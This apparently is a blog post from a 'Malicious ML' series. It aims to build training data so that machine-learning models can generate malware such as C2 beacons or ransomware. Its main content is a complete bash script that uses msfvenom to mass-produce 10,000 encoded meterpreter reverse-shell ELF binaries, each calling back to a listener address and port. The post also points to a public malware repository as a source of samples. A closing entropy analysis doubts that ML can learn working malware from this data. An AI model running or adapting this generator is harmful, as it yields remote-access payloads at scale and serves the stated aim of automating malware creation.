Purpose

If we want to train an ML algorithm to produce something malicious - say, a C2 beacon or a ransomware binary, we need good training data.

Approach

Use MSFVenom to generate a few thousand samples we can then feed into an ML algorithm.

Drawbacks

Due to bypassing compilers and linking steps, this at best will generate working binaries for a single architecture. Even if it generates a valid binary, it's not going to produce magical AV/EDR evading binaries compatible with multiple platforms and customizable C2 domains. However, it's still a fun experiment.

Alternatives to generation

There are lots of malicious binary examples out there.

VX-Underground

Download binaries directly from [[VX-Underground]] or a standard academic dataset. This introduces a lot of variety in PE/ELF format.

Code

Prereq - msfvenom installed

#!/bin/bash

overall_start_time=$(date +%s)
numFiles=10000
echo "Generating files.."
for i in $(seq 1 $numFiles); do

    LHOSTO=$((1 + $RANDOM % 100))
    LPORTCHOICES=(80 443 1025 8080 8888 4444 1234 12345 5555 3333 4433 8443 9999 10000)
    LPORTIDX=$(( $RANDOM % ${#LPORTCHOICES[@]} ))
    LPORTR=${LPORTCHOICES[$LPORTIDX]}
    FILENAME=$(uuidgen).elf
    PAYLOADTYPES=("linux/x86/meterpreter/reverse_tcp" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter/reverse_tcp_uuid" "linux/x86/meterpreter_reverse_https" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter_reverse_http" "linux/x86/meterpreter_reverse_https")
    PAYLOADIDX=$(( $RANDOM % ${#PAYLOADTYPES[@]} ))
    PAYLOAD=${PAYLOADTYPES[$PAYLOADIDX]}
    ENCODERS=("x86/shikata_ga_nai" "x86/xor_dynamic" "generic/none")
    ENCODERIDX=$((RANDOM % ${#ENCODERS[@]}))
    ENCODERR=${ENCODERS[$ENCODERIDX]}

    # Generate based on payload type
    start_time=$(date +%s)
    msfvenom -p $PAYLOAD LHOST=192.168.0.$LHOSTO LPORT=$LPORTR -e $ENCODERR -f elf -o out/$FILENAME 2> /dev/null
    end_time=$(date +%s)

    duration=$((end_time - start_time))
    # echo "Generated $FILENAME : $PAYLOAD : 192.168.0.$LHOSTO : $LPORTR in $duration seconds"
    echo -e "$FILENAME\t$PAYLOAD\t192.168.0.$LHOSTO\t$LPORTR\t$ENCODERR" >> labels.tsv

    percent=$((i * 100 / numFiles))
    printf "\rProgress: [%-50s] %d%%" $(printf "%-${percent}s" | tr ' ' '#') $percent
    echo -ne

done
overall_end_time=$(date +%s)
duration=$((overall_end_time - overall_start_time)) 
echo "Done in $duration seconds."

Explanation

Generate a bunch of meterpreter shells for use in ML algos.

Since the diffs in these files will simply be the encoded (or encrypted) payload, which will be high-entropy, it's doubtful any ML algorithm can learn enough to generate working binaries, much less working malware.

Entropy Analysis

Similarity of generated ELF binaries

We ran a simple cosine similarity comparison across the generated binaries. As the animation shows, these binaries show a fairly random distribution of differences; however, note the scale of differences is not extreme.

Still, it's a fun experiment.

Malicious ML series - generate ELF training data

Purpose

Approach

Drawbacks

Alternatives to generation

VX-Underground

Code

Explanation

Entropy Analysis

More from this blog

Updating the Purdue model for AI threats

Industrial Series - Don't use LLMs

LLM safety and CS Lewis

Putting the 'I' in CIA for AI Models: A Framework for Model Integrity

Command Palette

Purpose

Approach

Drawbacks

Alternatives to generation

VX-Underground

Code

Explanation

Entropy Analysis

More from this blog